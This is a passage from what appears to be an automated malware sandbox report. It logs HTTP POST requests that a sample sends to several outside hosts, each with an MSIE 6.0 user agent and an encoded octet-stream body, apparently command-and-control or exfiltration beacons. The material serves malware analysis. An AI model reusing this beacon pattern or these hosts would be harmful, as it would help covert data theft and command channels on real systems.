OVCA1LjE7IFNWMSkiLCJIVFRQX0NBQ0hFX0NPTlRST0wiOiJuby1jYWNoZSIsIlJFTU9URV9BRERSIjoiODQuMTcuNTIuNSIsIlJFUVVFU1RfU0NIRU1FIjoiaHR0cCIsIkNPTlRFWFRfUFJFRklYIjoiXC9zeXN0ZW0tYmluXC8iLCJDT05URVhUX0RPQ1VNRU5UX1JPT1QiOiJcL2t1bmRlblwvdXNyXC9saWJcL2NnaS1iaW5cLyIsIlJFTU9URV9QT1JUIjoiNjA1NjYiLCJSRURJUkVDVF9VUkwiOiJcL2luZGV4LnBocCIsIlJFUVVFU1RfTUVUSE9EIjoiUE9TVCIsIlFVRVJZX1NUUklORyI6IiIsIlNDUklQVF9OQU1FIjoiXC9pbmRleC5waHAiLCJTVEFUVVMiOiIyMDAiLCJPUklHX1BBVEhfSU5GTyI6IlwvaW5kZXgucGhwIiwiT1JJR19QQVRIX1RSQU5TTEFURUQiOiJcL2t1bmRlblwvaG9tZXBhZ2VzXC85XC9kMzI4MTUxODQ3XC9odGRvY3NcL2NsaWNrYW5kYnVpbGRzXC9teXJvcGNiXC9pbmRleC5waHAiLCJQSFBfU0VMRiI6IlwvaW5kZXgucGhwIiwiUkVRVUVTVF9USU1FX0ZMT0FUIjoxNjg4NTM3MTU5LjExOTgwMSwiUkVRVUVTVF9USU1FIjoxNjg4NTM3MTU5LCJhcmd2IjpbXSwiYXJnYyI6MH0%3D; myro_ct=eyJ1cmwiOiIiLCJpcCI6Ijg0LjE3LjUyLjUifQ%3D%3D; shield-notbot-nonce=c8fd351bd1
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 35 51 6e 6a 73 6e 6a 42 45 49 37 33 79 62 49 4a 2b 35 59 57 42 57 73 44 4a 7a 44 41 4b 56 52 63 4c 4a 54 43 36 67 5a 53 51 37 31 55 47 79 7a 4e 49 72 52 48 57 53 33 49 66 4f 44 5a 37 41 64 68 4d 4f 70 4d 43 4c 69 52 47 50 4c 70 6a 6a 7a 52 4e 59 2b 55 50 46 73 6e 63 61 72 75 56 6c 51 52 37 2b 73 35 63 51 45 6e 52 48 46 76 31 43 61 41 4e 61 76 6b 63 66 51 2b 51 35 7a 55 65 71 51 53 70 2b 42 45 42 71 4f 7a 66 4e 59 78 79 63 78 61 30 6c 41 49 6d 65 44 4a 6e 36 43 38 44 6c 56 75 54 43 4f 73 53 4c 58 4e 31 47 52 4c 72 32 6c 73 75 4b 54 70 58 35 6e 5a 43 46 58 56 48 65 38 58 77 42 6b 30 5a 52 4c 4a 77 74 45 44 5a 34 6a 33 72 67 59 58 5a 61 30 4e 78 32 77 44 46 69 2f 46 62 46 49 52 36 38 57 37 79 39 6f 51 37 50 53 58 44 6f 74 59 70 2f 56 52 62 52 6f 61 57 62 6a 2f 4b 55 63 67 64 41 48 46 51 4c 74 30 52 50 63 71 6a 79 59 75 75 63 2b 6c 68 35 70 2b 51 2b 41 4c 30 35 66 4b 5a 32 32 31 2b 45 30 73 70 71 61 42 55 32 46 32 71 6d 31 49 44 76 6e 59 73 58 5a 70 45 41 77 34 4d 58 56 4d 54 49 6e 62 6b 69 6a 69 37 73 49 4a 50 30 62 44 63 63 5a 39 4d 4d 55 31 52 73 50 4a 6a 48 50 4a 36 41 2f 37 73 73 6b 41 52 51 6b 78 75 58 52 2f 64 76 4c 50 56 41 75 47 56 53 69 72 46 6c 64 70 4a 79 34 65 79 48 35 4d 32 53 32 2b 68 75 72 6a 76 66 2b 4f 61 31 47 79 4a 71 77 38 4b 53 30 56 4a 55 43 41 52 63 6a 6b 68 74 76 30 46 54 47 4a 30 7a 5a 67 30 71 33 4b 53 6b 68 78 70 54 2b 48 35 64 37 67 53 75 78 6a 6e 39 6a 77 7a 50 79 38 5a 45 42 72 33 77 42 6a 6a 74 6f 61 77 36 78 4e 33 49 4e 74 70 72 4c 41 66 31 78 70 4e 61 71 6c 57 4f 41 7a 69 57 39 4a 6a 71 47 71 74 2f 45 52 74 38 42 63 31 63 39 55 34 54 7a 62 47 43 5a 39 39 4e 71 7a 7a 41 38 77 69 64 6f 51 45 32 35 50 47 50 38 3d Data Ascii: 5QnjsnjBEI73ybIJ+5YWBWsDJzDAKVRcLJTC6gZSQ71UGyzNIrRHWS3IfODZ7AdhMOpMCLiRGPLpjjzRNY+UPFsncaruVlQR7+s5cQEnRHFv1CaANavkcfQ+Q5zUeqQSp+BEBqOzfNYxycxa0lAImeDJn6C8DlVuTCOsSLXN1GRLr2lsuKTpX5nZCFXVHe8XwBk0ZRLJwtEDZ4j3rgYXZa0Nx2wDFi/FbFIR68W7y9oQ7PSXDotYp/VRbRoaWbj/KUcgdAHFQLt0RPcqjyYuuc+lh5p+Q+AL05fKZ221+E0spqaBU2F2qm1IDvnYsXZpEAw4MXVMTInbkiji7sIJP0bDccZ9MMU1RsPJjHPJ6A/7sskARQkxuXR/dvLPVAuGVSirFldpJy4eyH5M2S2+hurjvf+Oa1GyJqw8KS0VJUCARcjkhtv0FTGJ0zZg0q3KSkhxpT+H5d7gSuxjn9jwzPy8ZEBr3wBjjtoaw6xN3INtprLAf1xpNaqlWOAziW9JjqGqt/ERt8Bc1c9U4TzbGCZ99NqzzA8widoQE25PGP8=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.findbc.comCache-Control: no-cacheData Raw: 75 64 73 33 32 72 4e 59 47 6f 34 79 38 54 6a 46 2b 73 61 58 6e 46 77 4a 76 51 6f 5a 2f 61 51 32 6c 37 47 4b 4a 64 4e 76 71 48 6e 30 64 6a 47 4d 6c 59 72 59 31 4f 35 74 59 2f 4c 68 68 79 71 73 34 42 4d 78 32 77 41 72 45 6a 74 4d 31 75 76 6d 64 72 43 6a 41 36 67 4b 69 6b 78 4b 43 67 44 75 30 38 52 6e 6b 71 54 37 70 68 4c 5a 41 33 4a 69 36 4e 4b 51 6f 6c 6a 47 54 6d 75 35 30 36 71 66 46 52 30 47 7a 37 63 42 46 55 4d 4b 34 57 68 2b 38 71 51 67 6b 4c 79 31 6f 59 62 6a 4b 57 37 79 53 4f 2b 54 65 69 4c 2b 6b 62 2b 66 2b 76 74 66 79 58 54 4b 61 32 76 41 4d 47 50 31 65 63 43 56 72 55 45 65 49 55 58 44 75 67 44 57 4d 6f 36 71 31 76 54 51 49 68 51 2b 72 52 42 79 61 68 66 64 75 57 4c 41 30 36 77 53 34 43 2b 64 64 35 77 4f 38 37 51 70 4f 58 67 68 30 72 4f 62 39 66 6a 7a 35 72 49 59 72 69 59 33 57 59 43 4d 4b 61 64 68 4a 32 6b 41 78 46 76 4d 37 74 62 56 49 77 2f 65 7a 38 50 44 2f 43 52 4f 73 51 4c 54 77 4c 5a 48 42 79 58 78 5a 4f 41 34 4d 63 64 36 4d 5a 78 4f 73 59 54 36 71 52 37 67 62 63 41 7a 6b 64 69 59 65 39 45 54 37 55 45 70 5a 57 45 6f 41 41 6d 59 44 7a 71 6c 43 63 59 5a 79 6d 36 75 77 75 79 5a 4b 55 31 44 2b 78 67 54 55 32 4f 77 35 5a 70 48 6e 41 68 33 79 51 48 37 4a 35 52 66 36 39 74 4b 37 6e 6c 4e 61 59 43 45 49 56 30 77 78 77 35 59 30 32 61 44 79 75 54 72 55 79 59 30 47 30 2f 78 69 57 31 58 50 33 42 67 4e 75 48 2b 54 38 41 70 2b 66 54 7a 33 2f 57 2b 61 4c 76 55 57 41 71 51 55 57 59 30 36 36 78 59 69 6a 57 79 63 70 61 6b 4b 66 56 4e 52 52 70 31 51 37 58 56 48 59 44 50 62 4c 67 36 6d 44 51 75 53 73 43 33 54 6a 7a 36 5a 57 39 6a 64 35 70 69 4c 34 30 39 2f 58 6f 32 52 74 58 71 46 69 79 4b 42 4d 44 68 4b 54 69 54 75 4b 35 77 52 49 63 56 5a 70 6b 7a 47 77 3d 3d Data Ascii: uds32rNYGo4y8TjF+saXnFwJvQoZ/aQ2l7GKJdNvqHn0djGMlYrY1O5tY/Lhhyqs4BMx2wArEjtM1uvmdrCjA6gKikxKCgDu08RnkqT7phLZA3Ji6NKQoljGTmu506qfFR0Gz7cBFUMK4Wh+8qQgkLy1oYbjKW7ySO+TeiL+kb+f+vtfyXTKa2vAMGP1ecCVrUEeIUXDugDWMo6q1vTQIhQ+rRByahfduWLA06wS4C+dd5wO87QpOXgh0rOb9fjz5rIYriY3WYCMKadhJ2kAxFvM7tbVIw/ez8PD/CROsQLTwLZHByXxZOA4Mcd6MZxOsYT6qR7gbcAzkdiYe9ET7UEpZWEoAAmYDzqlCcYZym6uwuyZKU1D+xgTU2Ow5ZpHnAh3yQH7J5Rf69tK7nlNaYCEIV0wxw5Y02aDyuTrUyY0G0/xiW1XP3BgNuH+T8Ap+fTz3/W+aLvUWAqQUWY066xYijWycpakKfVNRRp1Q7XVHYDPbLg6mDQuSsC3Tjz6ZW9jd5piL409/Xo2RtXqFiyKBMDhKTiTuK5wRIcVZpkzGw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 77 35 55 34 53 76 42 4d 6c 46 58 50 6d 79 6e 77 41 33 73 4f 4c 36 4d 78 58 58 61 59 64 6f 39 73 4a 4e 50 56 77 69 59 37 54 38 66 71 4a 32 5a 68 5a 58 4c 5a 58 72 71 68 6d 4e 37 6f 49 6d 6f 45 54 55 79 31 4f 34 62 31 6c 4a 46 42 6d 4d 68 49 6f 6a 4e 56 47 58 69 53 41 63 72 79 78 67 78 64 74 61 4b 51 5a 31 31 30 61 62 2f 66 63 2b 35 41 71 71 4b 50 75 6c 70 32 4c 64 32 4a 74 37 65 4d 68 6a 67 34 75 49 67 74 55 52 70 38 61 45 47 57 5a 71 6a 61 36 34 4c 73 37 42 62 70 74 6d 76 42 36 6d 48 59 4d 4f 33 72 6d 4a 34 32 6d 2f 4a 73 78 4c 39 54 64 4d 64 44 54 6c 70 43 59 52 38 4f 47 49 79 63 34 46 36 7a 61 30 57 32 48 5a 55 69 6c 5a 39 4e 6b 53 46 6d 52 41 4e 2b 57 33 72 34 38 57 70 65 55 64 79 67 48 6b 4c 48 65 36 66 48 43 34 33 2f 78 6f 30 4a 38 42 33 4d 34 52 55 4b 36 70 6c 47 63 78 32 67 4e 4f 6f 6b 47 69 7a 59 64 33 43 6f 71 52 43 6f 63 79 4d 4b 2f 68 69 70 48 48 68 30 64 47 30 73 34 2f 50 38 4d 41 34 66 4a 35 33 67 53 70 56 77 43 47 4e 44 78 33 37 50 61 77 36 4c 6a 35 30 46 6b 4e 62 49 46 4d 2f 41 62 31 37 44 4a 52 41 4b 35 6c 42 72 41 4f 6d 4b 41 34 4a 39 4c 47 2f 54 78 49 41 52 61 30 33 78 54 67 42 55 71 71 72 33 59 78 54 43 36 36 75 57 68 6b 73 79 77 54 77 56 33 65 45 67 5a 6a 46 5a 50 75 38 6f 32 43 4b 4d 46 55 55 6c 70 51 44 47 39 74 53 6c 67 55 78 66 43 61 5a 31 33 6e 45 6f 72 37 34 5a 49 4b 4b 6f 6b 63 57 4d 75 51 66 46 7a 44 6f 54 45 42 44 6e 6e 34 76 66 74 49 58 47 4b 4f 79 34 43 5a 6e 50 4d 77 4b 65 2b 78 48 33 56 6c 33 62 7a 74 61 64 67 59 45 2b 62 66 74 68 68 31 77 71 31 6d 64 6b 41 4a 6d 6a 75 53 36 31 59 69 56 7a 2b 34 4a 43 68 64 74 68 48 75 6f 55 6d 37 68 30 48 33 32 6f 39 53 55 76 30 32 69 32 55 38 5a 38 50 7a 51 33 35 34 75 4d 4f 51 6a 32 2f 67 58 4d 51 39 45 50 47 5a 70 4b 69 63 56 32 4e 67 45 5a 69 77 56 6b 4b 51 3d 3d Data Ascii: w5U4SvBMlFXPmynwA3sOL6MxXXaYdo9sJNPVwiY7T8fqJ2ZhZXLZXrqhmN7oImoETUy1O4b1lJFBmMhIojNVGXiSAcryxgxdtaKQZ110ab/fc+5AqqKPulp2Ld2Jt7eMhjg4uIgtURp8aEGWZqja64Ls7BbptmvB6mHYMO3rmJ42m/JsxL9TdMdDTlpCYR8OGIyc4F6za0W2HZUilZ9NkSFmRAN+W3r48WpeUdygHkLHe6fHC43/xo0J8B3M4RUK6plGcx2gNOokGizYd3CoqRCocyMK/hipHHh0dG0s4/P8MA4fJ53gSpVwCGNDx37Paw6Lj50FkNbIFM/Ab17DJRAK5lBrAOmKA4J9LG/TxIARa03xTgBUqqr3YxTC66uWhksywTwV3eEgZjFZPu8o2CKMFUUlpQDG9tSlgUxfCaZ13nEor74ZIKKokcWMuQfFzDoTEBDnn4vftIXGKOy4CZnPMwKe+xH3Vl3bztadgYE+bfthh1wq1mdkAJmjuS61YiVz+4JChdthHuoUm7h0H32o9SUv02i2U8Z8PzQ354uMOQj2/gXMQ9EPGZpKicV2NgEZiwVkKQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 2b 30 6d 5a 48 39 67 36 6d 31 57 53 41 6b 58 6c 32 77 44 62 4c 63 75 6a 4c 39 75 67 7a 67 6f 6c 6a 43 73 57 6f 70 56 4e 6b 4a 62 48 64 68 39 6a 65 61 36 77 53 7a 50 73 5a 65 63 38 43 59 4e 68 4b 65 52 58 46 6d 79 75 32 4b 4f 55 36 32 63 4b 43 2f 75 72 6e 66 73 37 43 4f 4c 2b 63 49 2b 4d 4d 59 76 30 38 78 52 61 53 31 32 32 68 76 79 4a 6a 64 70 35 7a 36 64 66 2f 66 71 65 72 31 4c 6c 37 47 68 6c 46 4c 71 31 61 6a 57 72 44 54 70 50 42 54 2f 74 45 44 4e 7a 5a 6a 43 42 41 49 7a 76 2b 62 56 77 39 30 77 64 7a 2b 34 6b 79 65 41 41 5a 37 6c 2b 55 46 66 45 7a 61 55 30 55 74 7a 74 6e 79 43 65 35 46 2b 50 68 62 2b 65 6e 2b 64 47 54 46 65 47 45 46 65 63 74 62 5a 35 2b 45 35 62 30 52 59 4a 65 4f 36 7a 45 37 30 35 42 4c 52 64 41 65 49 72 65 6a 4a 65 54 59 39 30 70 64 6e 61 4e 38 56 5a 5a 59 53 4f 4f 70 2f 58 52 4a 39 76 64 72 4d 2f 58 32 77 6d 79 65 49 53 6b 41 79 63 67 36 54 66 35 67 36 47 34 48 30 43 66 6c 51 64 79 6f 58 4e 63 6f 4d 50 34 51 71 31 6e 6d 75 48 63 32 2b 6a 31 7a 71 59 74 34 7a 74 63 68 6a 79 43 49 4c 43 65 31 65 34 58 77 2f 4b 63 6a 2f 58 48 6a 41 62 6f 76 7a 4f 64 46 49 6a 6f 47 41 4f 45 69 73 79 74 47 6b 49 37 34 66 42 6b 6a 55 6c 63 4d 57 64 6f 66 34 2f 66 2f 2f 2f 77 5a 46 6f 53 50 2f 4b 4e 70 63 65 67 6c 45 6d 39 57 61 53 56 48 79 6d 36 50 56 6c 46 44 35 56 47 7a 51 50 68 41 6f 35 35 76 36 54 66 34 48 67 57 5a 6e 7a 34 33 6f 37 70 65 55 69 6e 43 48 4b 64 54 42 74 63 62 6e 56 78 57 4d 68 68 7a 64 67 76 47 31 79 6a 6f 41 4b 72 49 52 75 7a 64 50 74 54 4a 49 49 75 4e 66 45 63 55 4b 34 45 54 6d 65 56 44 7a 69 75 72 59 31 4a 70 6f 67 50 57 6b 56 51 71 73 4b 69 70 35 64 62 54 73 50 43 4b 5a 57 72 30 72 73 55 49 78 46 6c 38 36 68 5a 63 70 6c Data Ascii: +0mZH9g6m1WSAkXl2wDbLcujL9ugzgoljCsWopVNkJbHdh9jea6wSzPsZec8CYNhKeRXFmyu2KOU62cKC/urnfs7COL+cI+MMYv08xRaS122hvyJjdp5z6df/fqer1Ll7GhlFLq1ajWrDTpPBT/tEDNzZjCBAIzv+bVw90wdz+4kyeAAZ7l+UFfEzaU0UtztnyCe5F+Phb+en+dGTFeGEFectbZ5+E5b0RYJeO6zE705BLRdAeIrejJeTY90pdnaN8VZZYSOOp/XRJ9vdrM/X2wmyeISkAycg6Tf5g6G4H0CflQdyoXNcoMP4Qq1nmuHc2+j1zqYt4ztchjyCILCe1e4Xw/Kcj/XHjAbovzOdFIjoGAOEisytGkI74fBkjUlcMWdof4/f///wZFoSP/KNpceglEm9WaSVHym6PVlFD5VGzQPhAo55v6Tf4HgWZnz43o7peUinCHKdTBtcbnVxWMhhzdgvG1yjoAKrIRuzdPtTJIIuNfEcUK4ETmeVDziurY1JpogPWkVQqsKip5dbTsPCKZWr0rsUIxFl86hZcpl
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vazir.seCache-Control: no-cacheCookie: snkz=84.17.52.5; btst=14d34012b627d917de443054740519bb|84.17.52.5|1688537195|1688537169|7|3|0Data Raw: 45 4b 4d 76 54 7a 64 32 6c 46 57 47 77 57 6a 31 70 74 35 78 52 34 44 31 31 65 33 74 67 6f 4b 38 57 30 32 36 36 5a 33 75 71 44 65 6e 31 57 53 62 52 33 41 53 4c 54 59 37 4a 71 73 61 72 72 50 30 55 34 70 64 36 48 45 78 48 57 77 30 79 4e 32 61 75 70 58 74 32 44 4d 73 76 44 7a 51 65 52 49 2f 51 54 66 34 41 45 4c 49 41 34 46 66 78 61 61 79 4d 75 32 63 4d 35 73 63 6a 34 6c 4d 71 52 6f 4c 4c 64 36 61 64 47 41 6a 39 5a 79 6f 48 6d 6e 34 6a 47 32 74 2b 52 61 4b 68 45 69 68 69 49 4d 52 35 56 43 76 35 5a 4f 31 68 6b 47 4b 5a 6e 73 79 50 35 4b 69 54 57 62 79 77 78 4f 4e 72 31 70 75 65 41 36 2f 4c 46 6f 73 6c 78 67 54 71 38 6d 4c 46 54 6c 78 6e 65 4f 79 58 53 54 47 4a 64 41 79 41 4b 65 79 2f 4f 6c 7a 55 2f 2f 58 2f 59 48 31 30 42 77 39 4f 69 71 48 52 67 71 61 44 32 51 50 2f 69 76 61 56 65 37 49 65 54 47 44 2b 67 6b 48 6b 67 63 33 43 77 33 36 63 55 31 43 67 59 4c 6c 4d 32 58 5a 30 58 2f 36 54 47 67 59 70 4d 62 4a 70 7a 66 6d 74 67 48 74 34 68 74 30 65 30 68 73 4c 4a 4b 45 6e 69 6e 2f 6c 53 6e 56 6b 45 54 6d 76 43 6a 49 35 69 62 75 5a 73 4d 72 4b 50 61 68 6d 42 62 6a 47 4d 78 4c 4b 58 4d 34 46 31 4e 73 36 64 6e 6a 50 6c 62 4b 37 7a 31 57 35 71 6c 46 58 55 77 49 70 58 78 58 31 42 77 32 6d 4b 54 72 6b 53 2b 42 53 45 4f 4a 63 6a 58 37 32 4f 42 71 71 74 52 4c 78 57 66 45 37 31 68 57 4a 4a 71 4e 2f 53 35 62 66 6d 70 6f 6a 72 38 38 57 49 44 42 66 47 6a 4a 58 47 41 6a 54 37 4f 72 53 53 51 53 75 6b 62 65 75 4c 76 63 56 42 4b 72 54 6d 73 59 4e 33 57 35 7a 52 33 45 64 6b 77 57 48 4e 4d 4a 33 54 71 52 6c 62 37 45 55 76 63 54 6d 70 34 76 31 46 54 4b 77 68 51 35 76 69 74 71 4e 66 34 4b 4e 68 34 46 35 38 38 41 6a 35 79 61 38 62 57 63 41 55 71 4e 4d 37 50 5a 65 52 61 68 34 55 42 38 Data Ascii: EKMvTzd2lFWGwWj1pt5xR4D11e3tgoK8W0266Z3uqDen1WSbR3ASLTY7JqsarrP0U4pd6HExHWw0yN2aupXt2DMsvDzQeRI/QTf4AELIA4FfxaayMu2cM5scj4lMqRoLLd6adGAj9ZyoHmn4jG2t+RaKhEihiIMR5VCv5ZO1hkGKZnsyP5KiTWbywxONr1pueA6/LFoslxgTq8mLFTlxneOyXSTGJdAyAKey/OlzU//X/YH10Bw9OiqHRgqaD2QP/ivaVe7IeTGD+gkHkgc3Cw36cU1CgYLlM2XZ0X/6TGgYpMbJpzfmtgHt4ht0e0hsLJKEnin/lSnVkETmvCjI5ibuZsMrKPahmBbjGMxLKXM4F1Ns6dnjPlbK7z1W5qlFXUwIpXxX1Bw2mKTrkS+BSEOJcjX72OBqqtRLxWfE71hWJJqN/S5bfmpojr88WIDBfGjJXGAjT7OrSSQSukbeuLvcVBKrTmsYN3W5zR3EdkwWHNMJ3TqRlb7EUvcTmp4v1FTKwhQ5vitqNf4KNh4F588Aj5ya8bWcAUqNM7PZeRah4UB8
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 77 35 55 34 53 76 42 4d 6c 46 58 50 6d 79 6e 77 41 33 73 4f 4c 36 4d 78 58 58 61 59 64 6f 39 73 4a 4e 50 56 77 69 59 37 54 38 66 71 4a 32 5a 68 5a 58 4c 5a 58 72 71 68 6d 4e 37 6f 49 6d 6f 45 54 55 79 31 4f 34 62 31 6c 4a 46 42 6d 4d 68 49 6f 6a 4e 56 47 58 69 53 41 63 72 79 78 67 78 64 74 61 4b 51 5a 31 31 30 61 62 2f 66 63 2b 35 41 71 71 4b 50 75 6c 70 32 4c 64 32 4a 74 37 65 4d 68 6a 67 34 75 49 67 74 55 52 70 38 61 45 47 57 5a 71 6a 61 36 34 4c 73 37 42 62 70 74 6d 76 42 36 6d 48 59 4d 4f 33 72 6d 4a 34 32 6d 2f 4a 73 78 4c 39 54 64 4d 64 44 54 6c 70 43 59 52 38 4f 47 49 79 63 34 46 36 7a 61 30 57 32 48 5a 55 69 6c 5a 39 4e 6b 53 46 6d 52 41 4e 2b 57 33 72 34 38 57 70 65 55 64 79 67 48 6b 4c 48 65 36 66 48 43 34 33 2f 78 6f 30 4a 38 42 33 4d 34 52 55 4b 36 70 6c 47 63 78 32 67 4e 4f 6f 6b 47 69 7a 59 64 33 43 6f 71 52 43 6f 63 79 4d 4b 2f 68 69 70 48 48 68 30 64 47 30 73 34 2f 50 38 4d 41 34 66 4a 35 33 67 53 70 56 77 43 47 4e 44 78 33 37 50 61 77 36 4c 6a 35 30 46 6b 4e 62 49 46 4d 2f 41 62 31 37 44 4a 52 41 4b 35 6c 42 72 41 4f 6d 4b 41 34 4a 39 4c 47 2f 54 78 49 41 52 61 30 33 78 54 67 42 55 71 71 72 33 59 78 54 43 36 36 75 57 68 6b 73 79 77 54 77 56 33 65 45 67 5a 6a 46 5a 50 75 38 6f 32 43 4b 4d 46 55 55 6c 70 51 44 47 39 74 53 6c 67 55 78 66 43 61 5a 31 33 6e 45 6f 72 37 34 5a 49 4b 4b 6f 6b 63 57 4d 75 51 66 46 7a 44 6f 54 45 42 44 6e 6e 34 76 66 74 49 58 47 4b 4f 79 34 43 5a 6e 50 4d 77 4b 65 2b 78 48 33 56 6c 33 62 7a 74 61 64 67 59 45 2b 62 66 74 68 68 31 77 71 31 6d 64 6b 41 4a 6d 6a 75 53 36 31 59 69 56 7a 2b 34 4a 43 68 64 74 68 48 75 6f 55 6d 37 68 30 48 33 32 6f 39 53 55 76 30 32 69 32 55 38 5a 38 50 7a 51 33 35 34 75 4d 4f 51 6a 32 2f 67 58 4d 51 39 45 50 47 5a 70 4b 69 63 56 32 4e 67 45 5a 69 77 56 6b 4b 51 3d 3d Data Ascii: w5U4SvBMlFXPmynwA3sOL6MxXXaYdo9sJNPVwiY7T8fqJ2ZhZXLZXrqhmN7oImoETUy1O4b1lJFBmMhIojNVGXiSAcryxgxdtaKQZ110ab/fc+5AqqKPulp2Ld2Jt7eMhjg4uIgtURp8aEGWZqja64Ls7BbptmvB6mHYMO3rmJ42m/JsxL9TdMdDTlpCYR8OGIyc4F6za0W2HZUilZ9NkSFmRAN+W3r48WpeUdygHkLHe6fHC43/xo0J8B3M4RUK6plGcx2gNOokGizYd3CoqRCocyMK/hipHHh0dG0s4/P8MA4fJ53gSpVwCGNDx37Paw6Lj50FkNbIFM/Ab17DJRAK5lBrAOmKA4J9LG/TxIARa03xTgBUqqr3YxTC66uWhksywTwV3eEgZjFZPu8o2CKMFUUlpQDG9tSlgUxfCaZ13nEor74ZIKKokcWMuQfFzDoTEBDnn4vftIXGKOy4CZnPMwKe+xH3Vl3bztadgYE+bfthh1wq1mdkAJmjuS61YiVz+4JChdthHuoUm7h0H32o9SUv02i2U8Z8PzQ354uMOQj2/gXMQ9EPGZpKicV2NgEZiwVkKQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.c9dd.comCache-Control: no-cacheData Raw: 39 61 6f 43 6d 6d 54 6a 4b 49 36 39 58 4d 44 6d 2f 31 66 67 38 7a 63 30 35 6f 73 63 55 50 39 62 32 50 36 56 45 2b 44 6a 2b 73 72 43 52 75 46 37 6a 77 6d 57 6a 42 43 4b 4e 33 76 34 35 41 68 61 58 55 56 49 53 57 4b 7a 31 75 2f 79 70 71 68 6e 64 46 7a 41 70 73 64 59 63 7a 5a 70 44 31 73 30 2f 34 69 63 31 4e 43 37 4c 4f 39 61 38 47 76 4d 66 30 73 53 41 67 38 74 64 75 52 57 78 41 44 64 4d 77 2b 42 49 4e 6d 62 70 44 5a 63 7a 41 61 52 37 6d 58 78 46 44 55 66 52 73 36 32 69 71 45 70 68 74 48 62 48 70 4d 76 39 6d 32 59 72 49 2b 4b 2b 71 57 54 6e 42 4a 79 37 53 48 56 48 6d 61 41 59 30 2f 6b 47 75 37 33 71 32 51 6d 72 2f 34 64 70 2f 74 4a 70 4d 44 43 49 32 59 4e 41 55 48 4d 59 34 6d 4d 6c 31 76 67 65 64 48 6f 78 57 4c 76 71 37 58 56 2f 4d 2b 41 32 56 69 35 67 51 5a 33 55 2b 78 6c 48 47 68 4b 42 63 31 39 33 41 70 52 30 49 68 46 5a 66 6e 63 71 4c 4c 47 43 35 62 49 57 47 65 74 30 50 6f 33 57 4a 67 4e 46 6c 39 32 58 74 6d 39 51 44 31 4b 47 43 69 45 6b 4e 59 64 66 71 33 46 71 42 51 65 6a 69 38 6e 75 48 57 6a 7a 75 53 62 43 68 2b 63 58 2f 69 2b 76 34 53 34 56 67 52 70 6c 66 56 48 44 4b 37 59 30 75 79 42 72 6b 71 66 74 4f 36 4d 76 48 65 4c 58 33 50 35 57 6f 51 54 63 30 30 63 36 48 5a 4e 5a 57 4e 55 76 2f 6d 70 62 48 56 45 47 62 45 31 6a 6c 44 63 6d 56 52 33 62 34 4c 54 48 57 46 74 6f 65 47 43 30 70 31 74 6c 44 62 6d 6c 63 56 41 35 49 35 6f 51 7a 63 68 35 6b 4d 61 6b 4c 6a 4a 69 47 7a 32 6e 5a 73 31 36 38 43 6b 37 7a 72 47 50 63 68 4b 45 63 2f 49 4c 7a 62 67 7a 62 52 64 50 56 53 4c 30 6a 64 6d 36 37 7a 6c 59 4d 76 50 65 6a 4d 79 58 5a 6c 78 77 56 42 62 79 59 55 51 63 71 69 64 74 67 4f 46 77 73 69 4b 37 5a 36 52 51 31 6f 52 42 34 55 49 73 72 34 6f 50 50 36 76 6a 54 65 48 55 4e 35 2b 62 2b 6d 62 36 78 6a 64 6a 51 3d 3d Data Ascii: 9aoCmmTjKI69XMDm/1fg8zc05oscUP9b2P6VE+Dj+srCRuF7jwmWjBCKN3v45AhaXUVISWKz1u/ypqhndFzApsdYczZpD1s0/4ic1NC7LO9a8GvMf0sSAg8tduRWxADdMw+BINmbpDZczAaR7mXxFDUfRs62iqEphtHbHpMv9m2YrI+K+qWTnBJy7SHVHmaAY0/kGu73q2Qmr/4dp/tJpMDCI2YNAUHMY4mMl1vgedHoxWLvq7XV/M+A2Vi5gQZ3U+xlHGhKBc193ApR0IhFZfncqLLGC5bIWGet0Po3WJgNFl92Xtm9QD1KGCiEkNYdfq3FqBQeji8nuHWjzuSbCh+cX/i+v4S4VgRplfVHDK7Y0uyBrkqftO6MvHeLX3P5WoQTc00c6HZNZWNUv/mpbHVEGbE1jlDcmVR3b4LTHWFtoeGC0p1tlDbmlcVA5I5oQzch5kMakLjJiGz2nZs168Ck7zrGPchKEc/ILzbgzbRdPVSL0jdm67zlYMvPejMyXZlxwVBbyYUQcqidtgOFwsiK7Z6RQ1oRB4UIsr4oPP6vjTeHUN5+b+mb6xjdjQ==
